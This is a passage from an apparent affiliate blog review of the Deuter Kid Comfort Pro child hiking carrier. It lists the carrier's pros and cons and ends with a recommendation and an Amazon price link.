  5. The AirComfort back system allows you to customize the unit to fit you as it uses a mesh system that promotes airflow and ensures your child’s back is well ventilated as they sit against your spine.
  6. It is pretty roomy, which means your trip with this carrier won’t be cramped at all! You will easily go on hikes of up to several days and still ensure your child’s comfort.
  7. This is a lightweight carrier, which means you will have no trouble carrying it along with the rest of your gear without feeling too weighed down! It weighs just over 8 pounds, so you won’t feel the added weight even if you are trekking for hours on end.
  8. The Deuter Kid Comfort Pro is made of high-quality materials that are tear-resistant and provide just the right amount of flexibility as you take your child on a hike along a trail.
  9. This Deuter product is entirely free of per- and polyfluorinated chemicals. As a result, it lowers the amount of environmentally harmful chemicals that pollute the environment and endanger human health. PVC is used for various applications, including rain protection since it has dirt- and grease-repellent characteristics. Instead, Deuter employs DWR (Durable Water Repellency) impregnation, which is non-toxic to people and the environment.

Cons of the Deuter Kid Comfort Pro

  1. Some parents have mentioned that the seat is not entirely flat, which could be uncomfortable for your little one. This is, of course, entirely up to the child’s preference, but it is worth keeping that in mind.
  2. Some parents have complained that the sunshade is flimsy and not quite big enough, so you might want to opt for another child carrier if you are hiking in extreme heat conditions.
  3. This carrier is definitely on the pricier end of the scale. Still, if you want a durable and genuinely reliable hiking carrier, then this is something we highly recommend you invest in! It will not only give your child a comfortable ride, but it will also last for years and years if taken care of properly.
Check The Price on Amazon

Conclusion – is Deuter Kid Comfort Pro worth it?

Yes, we do highly recommend the Deuter Kid Comfort Pro! This is one of the top-rated childrens’ carriers on Amazon, and while it is pricier than most, it certainly delivers. It offers unparalleled comfort for your child along with extreme durability making it perfect for long treks in any terrain or climate condition. While the sunshade is a little on the light side, that can be remedied by using an umbrella with this unit, as it does have multiple adjustable harnesses and footwells to accommodate you and your child’s unique needs.

The high-quality product design ensures maximum safety for your child as well as a truly comfortable ride with a very sturdy back system and a well-padded seat that is made with mesh for airflow, keeping your child cool throughout the entire hiking adventure. Overall, this unit is excellent for hikers of any level who want to ensure their child’s safety and comfort while enjoying nature from a new perspective.

The reviews for this product on Amazon.com are very encouraging, with many shoppers seeing value in the Deuter Kid Comfort Pro for their families.

The post Deuter Kid Comfort Pro – Child Carrier You Can Trust appeared first on Comfy Bummy.